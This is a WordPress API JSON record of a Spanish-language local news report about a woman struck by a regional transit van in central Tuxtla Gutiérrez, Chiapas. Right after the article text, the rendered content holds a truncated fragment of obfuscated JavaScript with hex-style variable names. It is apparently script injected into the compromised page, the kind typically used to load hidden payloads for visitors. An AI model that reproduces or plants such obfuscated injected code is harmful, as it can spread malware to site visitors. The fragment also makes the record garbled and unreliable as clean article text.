{"id":4529,"date":"2022-08-18T23:50:50","date_gmt":"2022-08-18T23:50:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4529"},"modified":"2022-08-18T23:50:51","modified_gmt":"2022-08-18T23:50:51","slug":"mujer-fue-atropellada-en-el-centro-de-tuxtla-por-colectivo-foraneo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4529","title":{"rendered":"Mujer fue atropellada en el centro de Tuxtla por colectivo for\u00e1neo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660866515957-1024x576.jpg\" alt=\"\" class=\"wp-image-4530\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660866515957-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660866515957-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660866515957-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660866515957.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho. Agencia ReporteCiudadano,  18 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una mujer fue atropellada este jueves por la ma\u00f1ana en el centro de Tuxtla Guti\u00e9rrez por una unidad de transporte colectivo for\u00e1neo. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 la f\u00e9mina transitaba sobre la Sexta Sur y Primera Poniente cuando fue atropellada. La versi\u00f3n del ch\u00f3fer precis\u00f3 que la mujer cruz\u00f3 sin precaucion y al dar vuelta no pudo evitar el impacto. La v\u00edctima fue valorada por param\u00e9dicos de la CRM por lo que fue trasladada a un nosocomio para su atenci\u00f3n m\u00e9dica especializada. El conductor y la unidad que realiza el recorrido Tuxtla-San Fernando quedaron a disposici\u00f3n del Ministerio P\u00fablico en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 18 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una mujer fue atropellada este jueves por la ma\u00f1ana en el centro de Tuxtla Guti\u00e9rrez por una unidad de transporte colectivo for\u00e1neo. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 la f\u00e9mina transitaba sobre la Sexta Sur y Primera Poniente cuando fue &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4530,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4529","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4529","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4529"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4529\/revisions"}],"predecessor-version":[{"id":4531,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4529\/revisions\/4531"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4530"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4529"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4529"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4529"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}